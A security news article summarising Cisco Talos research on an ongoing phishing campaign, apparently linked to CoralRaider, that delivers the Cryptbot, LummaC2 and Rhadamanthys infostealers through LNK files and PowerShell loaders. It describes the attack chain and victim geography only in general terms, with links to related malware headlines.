24 April 2024

Ongoing malware campaign targets multiple industries, distributes infostealers


Ongoing malware campaign targets multiple industries, distributes infostealers

Cisco Talos threat intelligence research group has uncovered a sophisticated and ongoing cyber campaign, targeting victims across multiple countries since at least February 2024 with three infostealer malware variants: Cryptbot, LummaC2, and Rhadamanthys.

This malware is designed to harvest sensitive information from victims, including system and browser data, credentials, cryptocurrency wallets, and financial information.

One of the key findings of the campaign suspected to be linked to CoralRaider, a financially motivated threat actor of Vietnamese origin, disclosed by Talos in early April, is the deployment of a new PowerShell command-line argument embedded within LNK files. It is aimed at bypassing antivirus products and facilitating the download of the final payload onto victims' systems. The campaign leverages a Content Delivery Network (CDN) cache domain as a download server, hosting malicious HTA files and payloads.

Talos researchers have identified several tactics, techniques, and procedures (TTPs) employed in this campaign, bearing similarities to CoralRaider's previous Rotbot campaign. These include the use of Windows Shortcut files as the initial attack vector, intermediate PowerShell decryptors and payload download scripts, as well as the FoDHelper technique to bypass User Access Controls (UAC) on victim machines.

Talos has identified multiple command-and-control (C2) domains utilized by the threat actor in this campaign.

The campaign targets various industries and geographies, with victims reported in countries such as the US, Nigeria, Pakistan, Ecuador, Germany, Egypt, the UK, Poland, the Philippines, Norway, Japan, Syria, and Turkey. Telemetry data indicates that affected users also include employees of Japan's computer service call center organizations and civil defense service organizations in Syria.

According to Talos, the campaign's initial access vector appears to be phishing emails with the links leading to ZIP archives containing Windows shortcut (LNK) files. The shortcut files execute PowerShell scripts to fetch the next-stage HTA payload hosted on the CDN cache. Next, a JavaScript code embedded within the payload launches a concealed PowerShell loader, leading to the deployment of one of the three infostealer malware variants.

Back to the list

Latest Posts

Threat actors abusing Foxit PDF Reader flaw to deploy multiple malware variants

Threat actors abusing Foxit PDF Reader flaw to deploy multiple malware variants

The flaw involves Foxit PDF Reader's handling of pop-up messages.
20 May 2024
China-linked APT group uses malware to spy on commercial shipping

China-linked APT group uses malware to spy on commercial shipping

Mustang Panda infiltrated the computer systems of cargo shipping companies in Norway, Greece, and the Netherlands.
20 May 2024
The Grandoreiro malware is back up and running after January disruption

The Grandoreiro malware is back up and running after January disruption

Grandoreiro now targets over 1,500 banks worldwide, spanning more than 60 countries across Central and South America, Africa, Europe, and the Indo-Pacific region.
20 May 2024